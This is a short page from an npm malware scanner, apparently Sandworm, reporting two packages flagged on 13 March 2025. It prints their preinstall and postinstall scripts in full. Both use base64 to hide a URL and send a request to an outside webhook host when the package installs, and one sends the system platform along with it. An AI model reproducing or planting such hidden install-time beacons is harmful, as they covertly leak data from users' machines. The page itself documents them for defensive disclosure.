Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our π / Twitter feed for updates.
Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: preinstall
Package Source: βοΈ View on Npm
This script makes an HTTPS request to a potentially harmful URL that is fetched by decoding a base64 encoded string. The inclusion of system platform information in the request could be used to target the system or exploit vulnerabilities, posing a risk of remote code execution or data exposure.
Install script:
node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString() + '?os=' + encodeURIComponent(process.platform)).setTimeout(100).on('timeout', () => {}).end()"Detected: 13 Mar 2025
Detected Date: 13 Mar 2025
Affected Install Script: postinstall
Package Source: βοΈ View on Npm
This script makes an HTTPS request to a URL that is encoded in base64. If the URL points to a malicious domain, it can be used to exfiltrate sensitive information or execute further harmful actions, potentially compromising the system.
Install script:node -e "require('https').request(Buffer.from('aHR0cHM6Ly93ZWJob29rLXRlc3QuY29tL2JkOGQ1ZmI3NGMxNWRhYmFjYzNiZTliYTQ3Nzg2MGFh', 'base64').toString()).setTimeout(100).on('timeout', () => {}).end()"
